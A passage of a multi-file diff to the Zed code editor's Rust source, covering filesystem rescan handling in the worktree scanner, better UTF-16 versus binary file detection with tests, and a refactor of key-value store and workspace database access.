+ true
+ } else if left.path.starts_with(&right.path) {
+ if matches!(left.kind, Some(fs::PathEventKind::Rescan)) {
+ right.kind = left.kind;
+ }
+ true
+ } else {
+ false
+ }
+ });
{
let snapshot = &self.state.lock().await.snapshot;
@@ -4061,8 +4136,8 @@ impl BackgroundScanner {
}
}
- for (ix, abs_path) in abs_paths.iter().enumerate() {
- let abs_path = &SanitizedPath::new(&abs_path);
+ for (ix, event) in events.iter().enumerate() {
+ let abs_path = &SanitizedPath::new(&event.path);
let mut is_git_related = false;
let mut dot_git_paths = None;
@@ -4162,11 +4237,14 @@ impl BackgroundScanner {
continue;
}
- relative_paths.push(relative_path.into_arc());
+ relative_paths.push(EventRoot {
+ path: relative_path.into_arc(),
+ was_rescanned: matches!(event.kind, Some(fs::PathEventKind::Rescan)),
+ });
}
for range_to_drop in ranges_to_drop.into_iter().rev() {
- abs_paths.drain(range_to_drop);
+ events.drain(range_to_drop);
}
}
@@ -4190,12 +4268,24 @@ impl BackgroundScanner {
self.state.lock().await.snapshot.scan_id += 1;
let (scan_job_tx, scan_job_rx) = channel::unbounded();
- log::debug!("received fs events {:?}", relative_paths);
+ log::debug!(
+ "received fs events {:?}",
+ relative_paths
+ .iter()
+ .map(|event_root| &event_root.path)
+ .collect::<Vec<_>>()
+ );
self.reload_entries_for_paths(
&root_path,
&root_canonical_path,
- &relative_paths,
- abs_paths,
+ &relative_paths
+ .iter()
+ .map(|event_root| event_root.path.clone())
+ .collect::<Vec<_>>(),
+ events
+ .into_iter()
+ .map(|event| event.path)
+ .collect::<Vec<_>>(),
Some(scan_job_tx.clone()),
)
.await;
@@ -4223,7 +4313,8 @@ impl BackgroundScanner {
state.scanned_dirs.remove(&entry.id);
}
}
- self.send_status_update(false, SmallVec::new()).await;
+ self.send_status_update(false, SmallVec::new(), &relative_paths)
+ .await;
}
async fn update_global_gitignore(&self, abs_path: &Path) {
@@ -4249,7 +4340,7 @@ impl BackgroundScanner {
)
.await;
self.scan_dirs(false, scan_job_rx).await;
- self.send_status_update(false, SmallVec::new()).await;
+ self.send_status_update(false, SmallVec::new(), &[]).await;
}
async fn forcibly_load_paths(&self, paths: &[Arc<RelPath>]) -> bool {
@@ -4330,7 +4421,8 @@ impl BackgroundScanner {
) {
Ok(_) => {
last_progress_update_count += 1;
- self.send_status_update(true, SmallVec::new()).await;
+ self.send_status_update(true, SmallVec::new(), &[])
+ .await;
}
Err(count) => {
last_progress_update_count = count;
@@ -4359,19 +4451,22 @@ impl BackgroundScanner {
&self,
scanning: bool,
barrier: SmallVec<[barrier::Sender; 1]>,
+ event_roots: &[EventRoot],
) -> bool {
let mut state = self.state.lock().await;
- if state.changed_paths.is_empty() && scanning {
+ if state.changed_paths.is_empty() && event_roots.is_empty() && scanning {
return true;
}
+ let merged_event_roots = merge_event_roots(&state.changed_paths, event_roots);
+
let new_snapshot = state.snapshot.clone();
let old_snapshot = mem::replace(&mut state.prev_snapshot, new_snapshot.snapshot.clone());
let changes = build_diff(
self.phase,
&old_snapshot,
&new_snapshot,
- &state.changed_paths,
+ &merged_event_roots,
);
state.changed_paths.clear();
@@ -5225,11 +5320,40 @@ async fn discover_ancestor_git_repo(
(ignores, exclude, None)
}
+fn merge_event_roots(changed_paths: &[Arc<RelPath>], event_roots: &[EventRoot]) -> Vec<EventRoot> {
+ let mut merged_event_roots = Vec::with_capacity(changed_paths.len() + event_roots.len());
+ let mut changed_paths = changed_paths.iter().peekable();
+ let mut event_roots = event_roots.iter().peekable();
+ while let (Some(path), Some(event_root)) = (changed_paths.peek(), event_roots.peek()) {
+ match path.cmp(&&event_root.path) {
+ Ordering::Less => {
+ merged_event_roots.push(EventRoot {
+ path: (*changed_paths.next().expect("peeked changed path")).clone(),
+ was_rescanned: false,
+ });
+ }
+ Ordering::Equal => {
+ merged_event_roots.push((*event_roots.next().expect("peeked event root")).clone());
+ changed_paths.next();
+ }
+ Ordering::Greater => {
+ merged_event_roots.push((*event_roots.next().expect("peeked event root")).clone());
+ }
+ }
+ }
+ merged_event_roots.extend(changed_paths.map(|path| EventRoot {
+ path: path.clone(),
+ was_rescanned: false,
+ }));
+ merged_event_roots.extend(event_roots.cloned());
+ merged_event_roots
+}
+
fn build_diff(
phase: BackgroundScannerPhase,
old_snapshot: &Snapshot,
new_snapshot: &Snapshot,
- event_paths: &[Arc<RelPath>],
+ event_roots: &[EventRoot],
) -> UpdatedEntriesSet {
use BackgroundScannerPhase::*;
use PathChange::{Added, AddedOrUpdated, Loaded, Removed, Updated};
@@ -5237,13 +5361,14 @@ fn build_diff(
// Identify which paths have changed. Use the known set of changed
// parent paths to optimize the search.
let mut changes = Vec::new();
+
let mut old_paths = old_snapshot.entries_by_path.cursor::<PathKey>(());
let mut new_paths = new_snapshot.entries_by_path.cursor::<PathKey>(());
let mut last_newly_loaded_dir_path = None;
old_paths.next();
new_paths.next();
- for path in event_paths {
- let path = PathKey(path.clone());
+ for event_root in event_roots {
+ let path = PathKey(event_root.path.clone());
if old_paths.item().is_some_and(|e| e.path < path.0) {
old_paths.seek_forward(&path, Bias::Left);
}
@@ -5289,6 +5414,8 @@ fn build_diff(
} else {
changes.push((new_entry.path.clone(), new_entry.id, Updated));
}
+ } else if event_root.was_rescanned {
+ changes.push((new_entry.path.clone(), new_entry.id, Updated));
}
old_paths.next();
new_paths.next();
@@ -6055,7 +6182,7 @@ fn decode_byte_full(
}
}
-#[derive(PartialEq)]
+#[derive(Debug, PartialEq)]
enum ByteContent {
Utf16Le,
Utf16Be,
@@ -6111,13 +6238,24 @@ fn analyze_byte_content(bytes: &[u8]) -> ByteContent {
return ByteContent::Unknown;
}
- if total_null_count >= limit / 16 {
- if even_null_count > odd_null_count * 4 {
+ let has_significant_nulls = total_null_count >= limit / 16;
+ let nulls_skew_to_even = even_null_count > odd_null_count * 4;
+ let nulls_skew_to_odd = odd_null_count > even_null_count * 4;
+
+ if has_significant_nulls {
+ let sample = &bytes[..limit];
+
+ // UTF-16BE ASCII: [0x00, char] — nulls at even positions (high byte first)
+ // UTF-16LE ASCII: [char, 0x00] — nulls at odd positions (low byte first)
+
+ if nulls_skew_to_even && is_plausible_utf16_text(sample, false) {
return ByteContent::Utf16Be;
}
- if odd_null_count > even_null_count * 4 {
+
+ if nulls_skew_to_odd && is_plausible_utf16_text(sample, true) {
return ByteContent::Utf16Le;
}
+
return ByteContent::Binary;
}
@@ -6139,4 +6277,208 @@ fn is_known_binary_header(bytes: &[u8]) -> bool {
|| bytes.starts_with(b"GIF89a") // GIF89a
|| bytes.starts_with(b"IWAD") // Doom IWAD archive
|| bytes.starts_with(b"PWAD") // Doom PWAD archive
+ || bytes.starts_with(b"RIFF") // WAV, AVI, WebP
+ || bytes.starts_with(b"OggS") // OGG (Vorbis, Opus, FLAC)
+ || bytes.starts_with(b"fLaC") // FLAC
+ || bytes.starts_with(b"ID3") // MP3 with ID3v2 tag
+ || bytes.starts_with(b"\xFF\xFB") // MP3 frame sync (MPEG1 Layer3)
+ || bytes.starts_with(b"\xFF\xFA") // MP3 frame sync (MPEG1 Layer3)
+ || bytes.starts_with(b"\xFF\xF3") // MP3 frame sync (MPEG2 Layer3)
+ || bytes.starts_with(b"\xFF\xF2") // MP3 frame sync (MPEG2 Layer3)
+}
+
+// Null byte skew alone is not enough to identify UTF-16 -- binary formats with
+// small 16-bit values (like PCM audio) produce the same pattern. Decode the
+// bytes as UTF-16 and reject if too many code units land in control character
+// ranges or form unpaired surrogates, which real text almost never contains.
+fn is_plausible_utf16_text(bytes: &[u8], little_endian: bool) -> bool {
+ let mut suspicious_count = 0usize;
+ let mut total = 0usize;
+
+ let mut i = 0;
+ while let Some(code_unit) = read_u16(bytes, i, little_endian) {
+ total += 1;
+
+ match code_unit {
+ 0x0009 | 0x000A | 0x000C | 0x000D => {}
+ // C0/C1 control characters and non-characters
+ 0x0000..=0x001F | 0x007F..=0x009F | 0xFFFE | 0xFFFF => suspicious_count += 1,
+ 0xD800..=0xDBFF => {
+ let next_offset = i + 2;
+ let has_low_surrogate = read_u16(bytes, next_offset, little_endian)
+ .is_some_and(|next| (0xDC00..=0xDFFF).contains(&next));
+ if has_low_surrogate {
+ total += 1;
+ i += 2;
+ } else {
+ suspicious_count += 1;
+ }
+ }
+ // Lone low surrogate without a preceding high surrogate
+ 0xDC00..=0xDFFF => suspicious_count += 1,
+ _ => {}
+ }
+
+ i += 2;
+ }
+
+ if total == 0 {
+ return false;
+ }
+
+ // Real UTF-16 text has near-zero control characters; binary data with
+ // small 16-bit values typically exceeds 5%. 2% provides a safe margin.
+ suspicious_count * 100 < total * 2
+}
+
+fn read_u16(bytes: &[u8], offset: usize, little_endian: bool) -> Option<u16> {
+ let pair = [*bytes.get(offset)?, *bytes.get(offset + 1)?];
+ if little_endian {
+ return Some(u16::from_le_bytes(pair));
+ }
+ Some(u16::from_be_bytes(pair))
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ /// reproduction of issue #50785
+ fn build_pcm16_wav_bytes() -> Vec<u8> {
+ let header: Vec<u8> = vec![
+ /* RIFF header */
+ 0x52, 0x49, 0x46, 0x46, // "RIFF"
+ 0xc6, 0xcf, 0x00, 0x00, // file size: 8
+ 0x57, 0x41, 0x56, 0x45, // "WAVE"
+ /* fmt chunk */
+ 0x66, 0x6d, 0x74, 0x20, // "fmt "
+ 0x10, 0x00, 0x00, 0x00, // chunk size: 16
+ 0x01, 0x00, // format: PCM (1)
+ 0x01, 0x00, // channels: 1 (mono)
+ 0x80, 0x3e, 0x00, 0x00, // sample rate: 16000
+ 0x00, 0x7d, 0x00, 0x00, // byte rate: 32000
+ 0x02, 0x00, // block align: 2
+ 0x10, 0x00, // bits per sample: 16
+ /* LIST chunk */
+ 0x4c, 0x49, 0x53, 0x54, // "LIST"
+ 0x1a, 0x00, 0x00, 0x00, // chunk size: 26
+ 0x49, 0x4e, 0x46, 0x4f, // "INFO"
+ 0x49, 0x53, 0x46, 0x54, // "ISFT"
+ 0x0d, 0x00, 0x00, 0x00, // sub-chunk size: 13
+ 0x4c, 0x61, 0x76, 0x66, 0x36, 0x32, 0x2e, 0x33, // "Lavf62.3"
+ 0x2e, 0x31, 0x30, 0x30, 0x00, // ".100\0"
+ /* padding byte for word alignment */
+ 0x00, // data chunk header
+ 0x64, 0x61, 0x74, 0x61, // "data"
+ 0x80, 0xcf, 0x00, 0x00, // chunk size
+ ];
+
+ let mut bytes = header;
+
+ // fill remaining space up to `FILE_ANALYSIS_BYTES` with synthetic PCM
+ let audio_bytes_needed = FILE_ANALYSIS_BYTES - bytes.len();
+ for i in 0..(audio_bytes_needed / 2) {
+ let sample = (i & 0xFF) as u8;
+ bytes.push(sample); // low byte: varies
+ bytes.push(0x00); // high byte: zero for small values
+ }
+
+ bytes
+ }
+
+ #[test]
+ fn test_pcm16_wav_detected_as_binary() {
+ let wav_bytes = build_pcm16_wav_bytes();
+ assert_eq!(wav_bytes.len(), FILE_ANALYSIS_BYTES);
+
+ let result = analyze_byte_content(&wav_bytes);
+ assert_eq!(
+ result,
+ ByteContent::Binary,
+ "PCM 16-bit WAV should be detected as Binary via RIFF header"
+ );
+ }
+
+ #[test]
+ fn test_le16_binary_not_misdetected_as_utf16le() {
+ let mut bytes = b"FAKE".to_vec();
+ while bytes.len() < FILE_ANALYSIS_BYTES {
+ let sample = (bytes.len() & 0xFF) as u8;
+ bytes.push(sample);
+ bytes.push(0x00);
+ }
+ bytes.truncate(FILE_ANALYSIS_BYTES);
+
+ let result = analyze_byte_content(&bytes);
+ assert_eq!(
+ result,
+ ByteContent::Binary,
+ "LE 16-bit binary with control characters should be detected as Binary"
+ );
+ }
+
+ #[test]
+ fn test_be16_binary_not_misdetected_as_utf16be() {
+ let mut bytes = b"FAKE".to_vec();
+ while bytes.len() < FILE_ANALYSIS_BYTES {
+ bytes.push(0x00);
+ let sample = (bytes.len() & 0xFF) as u8;
+ bytes.push(sample);
+ }
+ bytes.truncate(FILE_ANALYSIS_BYTES);
+
+ let result = analyze_byte_content(&bytes);
+ assert_eq!(
+ result,
+ ByteContent::Binary,
+ "BE 16-bit binary with control characters should be detected as Binary"
+ );
+ }
+
+ #[test]
+ fn test_utf16le_text_detected_as_utf16le() {
+ let text = "Hello, world! This is a UTF-16 test string. ";
+ let mut bytes = Vec::new();
+ while bytes.len() < FILE_ANALYSIS_BYTES {
+ bytes.extend(text.encode_utf16().flat_map(|u| u.to_le_bytes()));
+ }
+ bytes.truncate(FILE_ANALYSIS_BYTES);
+
+ assert_eq!(analyze_byte_content(&bytes), ByteContent::Utf16Le);
+ }
+
+ #[test]
+ fn test_utf16be_text_detected_as_utf16be() {
+ let text = "Hello, world! This is a UTF-16 test string. ";
+ let mut bytes = Vec::new();
+ while bytes.len() < FILE_ANALYSIS_BYTES {
+ bytes.extend(text.encode_utf16().flat_map(|u| u.to_be_bytes()));
+ }
+ bytes.truncate(FILE_ANALYSIS_BYTES);
+
+ assert_eq!(analyze_byte_content(&bytes), ByteContent::Utf16Be);
+ }
+
+ #[test]
+ fn test_known_binary_headers() {
+ let cases: &[(&[u8], &str)] = &[
+ (b"RIFF\x00\x00\x00\x00WAVE", "WAV"),
+ (b"RIFF\x00\x00\x00\x00AVI ", "AVI"),
+ (b"OggS\x00\x02", "OGG"),
+ (b"fLaC\x00\x00", "FLAC"),
+ (b"ID3\x03\x00", "MP3 ID3v2"),
+ (b"\xFF\xFB\x90\x00", "MP3 MPEG1 Layer3"),
+ (b"\xFF\xF3\x90\x00", "MP3 MPEG2 Layer3"),
+ ];
+
+ for (header, label) in cases {
+ let mut bytes = header.to_vec();
+ bytes.resize(FILE_ANALYSIS_BYTES, 0x41); // pad with 'A'
+ assert_eq!(
+ analyze_byte_content(&bytes),
+ ByteContent::Binary,
+ "{label} should be detected as Binary"
+ );
+ }
+ }
}
@@ -409,6 +409,164 @@ async fn test_renaming_case_only(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+async fn test_root_rescan_reconciles_stale_state(cx: &mut TestAppContext) {
+ init_test(cx);
+ let fs = FakeFs::new(cx.background_executor.clone());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "old.txt": "",
+ }),
+ )
+ .await;
+
+ let tree = Worktree::local(
+ Path::new("/root"),
+ true,
+ fs.clone(),
+ Default::default(),
+ true,
+ WorktreeId::from_proto(0),
+ &mut cx.to_async(),
+ )
+ .await
+ .unwrap();
+
+ cx.read(|cx| tree.read(cx).as_local().unwrap().scan_complete())
+ .await;
+
+ tree.read_with(cx, |tree, _| {
+ assert_eq!(
+ tree.entries(true, 0)
+ .map(|entry| entry.path.as_ref())
+ .collect::<Vec<_>>(),
+ vec![rel_path(""), rel_path("old.txt")]
+ );
+ });
+
+ fs.pause_events();
+ fs.remove_file(Path::new("/root/old.txt"), RemoveOptions::default())
+ .await
+ .unwrap();
+ fs.insert_file(Path::new("/root/new.txt"), Vec::new()).await;
+ assert_eq!(fs.buffered_event_count(), 2);
+ fs.clear_buffered_events();
+
+ tree.read_with(cx, |tree, _| {
+ assert!(tree.entry_for_path(rel_path("old.txt")).is_some());
+ assert!(tree.entry_for_path(rel_path("new.txt")).is_none());
+ });
+
+ fs.emit_fs_event("/root", Some(fs::PathEventKind::Rescan));
+ fs.unpause_events_and_flush();
+ tree.flush_fs_events(cx).await;
+
+ tree.read_with(cx, |tree, _| {
+ assert!(tree.entry_for_path(rel_path("old.txt")).is_none());
+ assert!(tree.entry_for_path(rel_path("new.txt")).is_some());
+ assert_eq!(
+ tree.entries(true, 0)
+ .map(|entry| entry.path.as_ref())
+ .collect::<Vec<_>>(),
+ vec![rel_path(""), rel_path("new.txt")]
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_subtree_rescan_reports_unchanged_descendants_as_updated(cx: &mut TestAppContext) {
+ init_test(cx);
+ let fs = FakeFs::new(cx.background_executor.clone());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "dir": {
+ "child.txt": "",
+ "nested": {
+ "grandchild.txt": "",
+ },
+ "remove": {
+ "removed.txt": "",
+ }
+ },
+ "other.txt": "",
+ }),
+ )
+ .await;
+
+ let tree = Worktree::local(
+ Path::new("/root"),
+ true,
+ fs.clone(),
+ Default::default(),
+ true,
+ WorktreeId::from_proto(0),
+ &mut cx.to_async(),
+ )
+ .await
+ .unwrap();
+
+ cx.read(|cx| tree.read(cx).as_local().unwrap().scan_complete())
+ .await;
+
+ let tree_updates = Arc::new(Mutex::new(Vec::new()));
+ tree.update(cx, |_, cx| {
+ let tree_updates = tree_updates.clone();
+ cx.subscribe(&tree, move |_, _, event, _| {
+ if let Event::UpdatedEntries(update) = event {
+ tree_updates.lock().extend(
+ update
+ .iter()
+ .filter(|(path, _, _)| path.as_ref() != rel_path("fs-event-sentinel"))
+ .map(|(path, _, change)| (path.clone(), *change)),
+ );
+ }
+ })
+ .detach();
+ });
+ fs.pause_events();
+ fs.insert_file("/root/dir/new.txt", b"new content".to_vec())
+ .await;
+ fs.remove_dir(
+ "/root/dir/remove".as_ref(),
+ RemoveOptions {
+ recursive: true,
+ ignore_if_not_exists: false,
+ },
+ )
+ .await
+ .unwrap();
+ fs.clear_buffered_events();
+ fs.unpause_events_and_flush();
+
+ fs.emit_fs_event("/root/dir", Some(fs::PathEventKind::Rescan));
+ tree.flush_fs_events(cx).await;
+
+ assert_eq!(
+ mem::take(&mut *tree_updates.lock()),
+ &[
+ (rel_path("dir").into(), PathChange::Updated),
+ (rel_path("dir/child.txt").into(), PathChange::Updated),
+ (rel_path("dir/nested").into(), PathChange::Updated),
+ (
+ rel_path("dir/nested/grandchild.txt").into(),
+ PathChange::Updated
+ ),
+ (rel_path("dir/new.txt").into(), PathChange::Added),
+ (rel_path("dir/remove").into(), PathChange::Removed),
+ (
+ rel_path("dir/remove/removed.txt").into(),
+ PathChange::Removed
+ ),
+ ]
+ );
+
+ tree.read_with(cx, |tree, _| {
+ assert!(tree.entry_for_path(rel_path("other.txt")).is_some());
+ });
+}
+
#[gpui::test]
async fn test_open_gitignored_files(cx: &mut TestAppContext) {
init_test(cx);
@@ -2,7 +2,7 @@
description = "The fast, collaborative code editor."
edition.workspace = true
name = "zed"
-version = "0.228.0"
+version = "0.230.0"
publish.workspace = true
license = "GPL-3.0-or-later"
authors = ["Zed Team <hi@zed.dev>"]
@@ -7,12 +7,14 @@ fn main() {
// Add rpaths for libraries that webrtc-sys dlopens at runtime.
// This is mostly required for hosts with non-standard SO installation
// locations such as NixOS.
- let dlopened_libs = ["libva", "libva-drm"];
+ let dlopened_libs = ["libva", "libva-drm", "egl"];
let mut rpath_dirs = std::collections::BTreeSet::new();
for lib in &dlopened_libs {
if let Some(libdir) = pkg_config::get_variable(lib, "libdir").ok() {
rpath_dirs.insert(libdir);
+ } else {
+ eprintln!("zed build.rs: {lib} not found in pkg-config's path");
}
}
@@ -14,7 +14,7 @@ use client::{Client, ProxySettings, UserStore, parse_zed_link};
use collab_ui::channel_view::ChannelView;
use collections::HashMap;
use crashes::InitCrashHandler;
-use db::kvp::{GLOBAL_KEY_VALUE_STORE, KEY_VALUE_STORE};
+use db::kvp::{GlobalKeyValueStore, KeyValueStore};
use editor::Editor;
use extension::ExtensionHostProxy;
use fs::{Fs, RealFs};
@@ -325,12 +325,16 @@ fn main() {
let app =
Application::with_platform(gpui_platform::current_platform(false)).with_assets(Assets);
+ let app_db = db::AppDatabase::new();
let system_id = app.background_executor().spawn(system_id());
- let installation_id = app.background_executor().spawn(installation_id());
- let session_id = Uuid::new_v4().to_string();
- let session = app
+ let installation_id = app
.background_executor()
- .spawn(Session::new(session_id.clone()));
+ .spawn(installation_id(KeyValueStore::from_app_db(&app_db)));
+ let session_id = Uuid::new_v4().to_string();
+ let session = app.background_executor().spawn(Session::new(
+ session_id.clone(),
+ KeyValueStore::from_app_db(&app_db),
+ ));
crashes::init(
InitCrashHandler {
@@ -451,7 +455,8 @@ fn main() {
});
app.run(move |cx| {
- let db_trusted_paths = match workspace::WORKSPACE_DB.fetch_trusted_worktrees() {
+ cx.set_global(app_db);
+ let db_trusted_paths = match workspace::WorkspaceDb::global(cx).fetch_trusted_worktrees() {
Ok(trusted_paths) => trusted_paths,
Err(e) => {
log::error!("Failed to do initial trusted worktrees fetch: {e:#}");
@@ -1300,42 +1305,37 @@ async fn authenticate(client: Arc<Client>, cx: &AsyncApp) -> Result<()> {
async fn system_id() -> Result<IdType> {
let key_name = "system_id".to_string();
+ let db = GlobalKeyValueStore::global();
- if let Ok(Some(system_id)) = GLOBAL_KEY_VALUE_STORE.read_kvp(&key_name) {
+ if let Ok(Some(system_id)) = db.read_kvp(&key_name) {
return Ok(IdType::Existing(system_id));
}
let system_id = Uuid::new_v4().to_string();
- GLOBAL_KEY_VALUE_STORE
- .write_kvp(key_name, system_id.clone())
- .await?;
+ db.write_kvp(key_name, system_id.clone()).await?;
Ok(IdType::New(system_id))
}
-async fn installation_id() -> Result<IdType> {
+async fn installation_id(db: KeyValueStore) -> Result<IdType> {
let legacy_key_name = "device_id".to_string();
let key_name = "installation_id".to_string();
// Migrate legacy key to new key
- if let Ok(Some(installation_id)) = KEY_VALUE_STORE.read_kvp(&legacy_key_name) {
- KEY_VALUE_STORE
- .write_kvp(key_name, installation_id.clone())
- .await?;
- KEY_VALUE_STORE.delete_kvp(legacy_key_name).await?;
+ if let Ok(Some(installation_id)) = db.read_kvp(&legacy_key_name) {
+ db.write_kvp(key_name, installation_id.clone()).await?;
+ db.delete_kvp(legacy_key_name).await?;
return Ok(IdType::Existing(installation_id));
}
- if let Ok(Some(installation_id)) = KEY_VALUE_STORE.read_kvp(&key_name) {
+ if let Ok(Some(installation_id)) = db.read_kvp(&key_name) {
return Ok(IdType::Existing(installation_id));
}
let installation_id = Uuid::new_v4().to_string();
- KEY_VALUE_STORE
- .write_kvp(key_name, installation_id.clone())
- .await?;
+ db.write_kvp(key_name, installation_id.clone()).await?;
Ok(IdType::New(installation_id))
}
@@ -1344,6 +1344,7 @@ pub(crate) async fn restore_or_create_workspace(
app_state: Arc<AppState>,
cx: &mut AsyncApp,
) -> Result<()> {
+ let kvp = cx.update(|cx| KeyValueStore::global(cx));
if let Some((multi_workspaces, remote_workspaces)) = restorable_workspaces(cx, &app_state).await
{
let mut results: Vec<Result<(), Error>> = Vec::new();
@@ -1452,7 +1453,7 @@ pub(crate) async fn restore_or_create_workspace(
.await?;
}
}
- } else if matches!(KEY_VALUE_STORE.read_kvp(FIRST_OPEN), Ok(None)) {
+ } else if matches!(kvp.read_kvp(FIRST_OPEN), Ok(None)) {
cx.update(|cx| show_onboarding_view(app_state, cx)).await?;
} else {
cx.update(|cx| {
@@ -1488,7 +1489,8 @@ async fn restorable_workspaces(
let (remote_workspaces, local_workspaces) = locations
.into_iter()
.partition(|sw| matches!(sw.location, SerializedWorkspaceLocation::Remote(_)));
- let multi_workspaces = workspace::read_serialized_multi_workspaces(local_workspaces);
+ let multi_workspaces =
+ cx.update(|cx| workspace::read_serialized_multi_workspaces(local_workspaces, cx));
Some((multi_workspaces, remote_workspaces))
}
@@ -1496,7 +1498,12 @@ pub(crate) async fn restorable_workspace_locations(
cx: &mut AsyncApp,
app_state: &Arc<AppState>,
) -> Option<Vec<SessionWorkspace>> {
- let mut restore_behavior = cx.update(|cx| WorkspaceSettings::get(None, cx).restore_on_startup);
+ let (mut restore_behavior, db) = cx.update(|cx| {
+ (
+ WorkspaceSettings::get(None, cx).restore_on_startup,
+ workspace::WorkspaceDb::global(cx),
+ )
+ });
let session_handle = app_state.session.clone();
let (last_session_id, last_session_window_stack) = cx.update(|cx| {
@@ -1519,7 +1526,7 @@ pub(crate) async fn restorable_workspace_locations(
match restore_behavior {
workspace::RestoreOnStartupBehavior::LastWorkspace => {
- workspace::last_opened_workspace_location(app_state.fs.as_ref())
+ workspace::last_opened_workspace_location(&db, app_state.fs.as_ref())
.await
.map(|(workspace_id, location, paths)| {
vec![SessionWorkspace {
@@ -1535,6 +1542,7 @@ pub(crate) async fn restorable_workspace_locations(
let ordered = last_session_window_stack.is_some();
let mut locations = workspace::last_session_workspace_locations(
+ &db,
&last_session_id,
last_session_window_stack,
app_state.fs.as_ref(),
@@ -103,10 +103,11 @@ use {
feature_flags::FeatureFlagAppExt as _,
git_ui::project_diff::ProjectDiff,
gpui::{
- App, AppContext as _, Bounds, KeyBinding, Modifiers, SharedString, VisualTestAppContext,
+ App, AppContext as _, Bounds, Entity, KeyBinding, Modifiers, VisualTestAppContext,
WindowBounds, WindowHandle, WindowOptions, point, px, size,
},
image::RgbaImage,
+ project::{AgentId, Project},
project_panel::ProjectPanel,
settings::{NotifyWhenAgentWaiting, Settings as _},
settings_ui::SettingsWindow,
@@ -1958,13 +1959,14 @@ impl AgentServer for StubAgentServer {
ui::IconName::ZedAssistant
}
- fn name(&self) -> SharedString {
+ fn agent_id(&self) -> AgentId {
"Visual Test Agent".into()
}
fn connect(
&self,
_delegate: AgentServerDelegate,
+ _project: Entity<Project>,
_cx: &mut App,
) -> gpui::Task<gpui::Result<Rc<dyn AgentConnection>>> {
gpui::Task::ready(Ok(Rc::new(self.connection.clone())))
@@ -2658,8 +2660,8 @@ fn run_multi_workspace_sidebar_visual_tests(
.context("Failed to create sidebar")?;
multi_workspace_window
- .update(cx, |multi_workspace, window, cx| {
- multi_workspace.register_sidebar(sidebar.clone(), window, cx);
+ .update(cx, |multi_workspace, _window, cx| {
+ multi_workspace.register_sidebar(sidebar.clone(), cx);
})
.context("Failed to register sidebar")?;
@@ -3190,8 +3192,8 @@ edition = "2021"
.context("Failed to create sidebar")?;
workspace_window
- .update(cx, |multi_workspace, window, cx| {
- multi_workspace.register_sidebar(sidebar.clone(), window, cx);
+ .update(cx, |multi_workspace, _window, cx| {
+ multi_workspace.register_sidebar(sidebar.clone(), cx);
})
.context("Failed to register sidebar")?;
@@ -3488,7 +3490,7 @@ edition = "2021"
// Insert a message into the active thread's message editor and submit.
let thread_view = cx
- .read(|cx| panel.read(cx).as_active_thread_view(cx))
+ .read(|cx| panel.read(cx).active_thread_view(cx))
.ok_or_else(|| anyhow::anyhow!("No active thread view"))?;
cx.update_window(workspace_window.into(), |_, window, cx| {
@@ -3557,7 +3559,7 @@ edition = "2021"
new_workspace.read(cx).panel::<AgentPanel>(cx)
})?;
if let Some(new_panel) = new_panel {
- let new_thread_view = cx.read(|cx| new_panel.read(cx).as_active_thread_view(cx));
+ let new_thread_view = cx.read(|cx| new_panel.read(cx).active_thread_view(cx));
if let Some(new_thread_view) = new_thread_view {
cx.update_window(workspace_window.into(), |_, window, cx| {
let message_editor = new_thread_view.read(cx).message_editor.clone();
@@ -17,7 +17,7 @@ use agent_ui::{AgentDiffToolbar, AgentPanelDelegate};
use anyhow::Context as _;
pub use app_menus::*;
use assets::Assets;
-use audio::{AudioSettings, REPLAY_DURATION};
+
use breadcrumbs::Breadcrumbs;
use client::zed_urls;
use collections::VecDeque;
@@ -69,7 +69,7 @@ use settings::{
update_settings_file,
};
use sidebar::Sidebar;
-use std::time::Duration;
+
use std::{
borrow::Cow,
path::{Path, PathBuf},
@@ -84,9 +84,7 @@ use util::rel_path::RelPath;
use util::{ResultExt, asset_str, maybe};
use uuid::Uuid;
use vim_mode_setting::VimModeSetting;
-use workspace::notifications::{
- NotificationId, SuppressEvent, dismiss_app_notification, show_app_notification,
-};
+use workspace::notifications::{NotificationId, dismiss_app_notification, show_app_notification};
use workspace::{
AppState, MultiWorkspace, NewFile, NewWindow, OpenLog, Panel, Toast, Workspace,
@@ -94,8 +92,7 @@ use workspace::{
notifications::simple_message_notification::MessageNotification, open_new,
};
use workspace::{
- CloseIntent, CloseProject, CloseWindow, NotificationFrame, RestoreBanner,
- with_active_or_new_workspace,
+ CloseIntent, CloseProject, CloseWindow, RestoreBanner, with_active_or_new_workspace,
};
use workspace::{Pane, notifications::DetachAndPromptErr};
use zed_actions::{
@@ -144,10 +141,6 @@ actions!(
actions!(
dev,
[
- /// Stores last 30s of audio from zed staff using the experimental rodio
- /// audio system (including yourself) on the current call in a tar file
- /// in the current working directory.
- CaptureRecentAudio,
/// Opens a prompt to enter a URL to open.
OpenUrlPrompt,
]
@@ -163,21 +156,24 @@ pub fn init(cx: &mut App) {
cx.on_action(quit);
cx.on_action(|_: &RestoreBanner, cx| title_bar::restore_banner(cx));
- let flag = cx.wait_for_flag::<PanicFeatureFlag>();
- cx.spawn(async |cx| {
- if cx.update(|cx| ReleaseChannel::global(cx) == ReleaseChannel::Dev) || flag.await {
- cx.update(|cx| {
- cx.on_action(|_: &TestPanic, _| panic!("Ran the TestPanic action"))
- .on_action(|_: &TestCrash, _| {
- unsafe extern "C" {
- fn puts(s: *const i8);
- }
- unsafe {
- puts(0xabad1d3a as *const i8);
- }
- });
- });
- };
+
+ cx.observe_flag::<PanicFeatureFlag, _>({
+ let mut added = false;
+ move |enabled, cx| {
+ if added || !enabled {
+ return;
+ }
+ added = true;
+ cx.on_action(|_: &TestPanic, _| panic!("Ran the TestPanic action"))
+ .on_action(|_: &TestCrash, _| {
+ unsafe extern "C" {
+ fn puts(s: *const i8);
+ }
+ unsafe {
+ puts(0xabad1d3a as *const i8);
+ }
+ });
+ }
})
.detach();
cx.on_action(|_: &OpenLog, cx| {
@@ -395,7 +391,7 @@ pub fn initialize_workspace(
let sidebar =
cx.new(|cx| Sidebar::new(multi_workspace_handle.clone(), window, cx));
multi_workspace_handle.update(cx, |multi_workspace, cx| {
- multi_workspace.register_sidebar(sidebar, window, cx);
+ multi_workspace.register_sidebar(sidebar, cx);
});
})
.ok();
@@ -1078,37 +1074,54 @@ fn register_actions(
})
.register_action({
let app_state = Arc::downgrade(&app_state);
- move |_, _: &CloseProject, window, cx| {
